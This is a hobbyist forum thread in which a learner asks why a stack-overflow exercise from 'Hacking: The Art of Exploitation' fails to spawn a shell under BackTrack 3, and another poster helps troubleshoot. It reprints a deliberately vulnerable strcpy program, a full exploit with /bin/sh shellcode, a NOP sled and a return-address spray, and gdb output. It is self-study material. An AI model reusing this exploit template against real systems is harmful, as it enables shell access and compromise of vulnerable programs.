DEP in BT3? exploit

[phil128]

I'm practicing coding an exploit from a book in currently working through (Hacking the art of exploitation)

Now there's a program in the book thts vulnerable to a stack overflow. The other program is the exploit tht takes advantage of the program by shuffling data into the buffer with the bytecode. Now the problem is i can understand some parts of the program. But when i compile both the vulnerable program and exploit it doesnt seem to wanna spit out a shell. Now i've written vulnerable
program and tried to overwrite the EIP and i've looked at GDB now i cannot seem to over right the register. Now i know there're programs tht do additional checks on the EIP, and processors now are armed with DEP even tho i've disabled it in the BIOS and still i cannot over right the EIP. I've updated the BT3 Kernel to 2.6.24 and i'm not too sure if the latest kernel does do additional checks on the EIP.

All i wanna know is there a way to know if anything like DEP has been enabled on my system?

Thanks people

[ShadowKill]

Can you provide us with the source of your vuln-program/exploit/shellcode so we may see if theres simply a coding/scripting error?

[phil128]

yea sure.

the program....

#include<stdio.h>
#include<string.h>

int main(int argc, char *argv[])
{
char buffer[5];
strcpy(buffer, argv[1]);
return 0;
}


the exploit....

#include <stdlib.h>

char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\ x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\ x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\ x6e\x2f\x73"
"\x68";

unsigned long sp(void) // This is just a little function
{ __asm__("movl %esp, %eax");} // used to return the stack pointer

int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer, *ptr;

offset = 0; // Use an offset of 0
esp = sp(); // Put the current stack pointer into esp
ret = esp - offset; // We want to overwrite the ret address

printf("Stack pointer (ESP) : 0x%x\n", esp);
printf(" Offset from ESP : 0x%x\n", offset);
printf("Desired Return Addr : 0x%x\n", ret);

// Allocate 600 bytes for buffer (on the heap)
buffer = malloc(600);

// Fill the entire buffer with the desired ret address
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 600; i+=4)
{ *(addr_ptr++) = ret; }


// Fill the first 200 bytes of the buffer with NOP instructions
for(i=0; i < 200; i++)
{ buffer[i] = '\x90'; }

// Put the shellcode after the NOP sled
ptr = buffer + 200;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }

// End the string
buffer[600-1] = 0;

// Now call the program ./vuln with our crafted buffer as its argument
execl("./vuln", "vuln", buffer, 0);

// Free the buffer memory
free(buffer);

return 0;
}
.

I've compiled them both and when i try to run the exploit all i get is segmentation violation which is understandable. When i put the program in gdb and send loads if 'A's this is what i get.

(gdb) info registers
eax 0x0 0
ecx 0x41414141 1094795585
edx 0xbfa2e532 -1079843534
ebx 0xb7f5fff4 -1208614924
esp 0x4141413d 0x4141413d
ebp 0x41414141 0x41414141
esi 0xb7f95ce0 -1208394528
edi 0x0 0
eip 0x8048389 0x8048389 <main+53> <not overritten even after 100+ 'A's>
eflags 0x210286 [ PF SF IF RF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51

what i was talking about DEP or summat else begin enabled is 'wrong' :-p. Cause i managed to make a program tht instead of taking in an argument it copies a buffer into another buffer thts in a function, i can understand how i can over right the return address and i'm copying a buffer into another buffer using a function in which the EIP is overwritten.

Its jus tht program above i got from tht book i cannot seem to get working.

Thanks for your help.

I hope i've provided enough information to solve the problem

[ShadowKill]

Okay, i'll take a better look at this in a minute but first, are you sure that your shellcode contains no 'null' characters (0)? Because if so, that will register as a stop and exit the program.....

[phil128]

Nal it doesn't contain NULL characters. I'm just wondering why it doesn't work as NOP (x90) code are being fed into the the buffer with the return address and the shell code but even still the the shell code doesn't wanna execute even tho the exploit is using the NOP method to execute the shellcode. I'm gonna have a look at it more. I shall get back to ya if i find a'way to the shellcode to work. Thanks for your help tho!!!!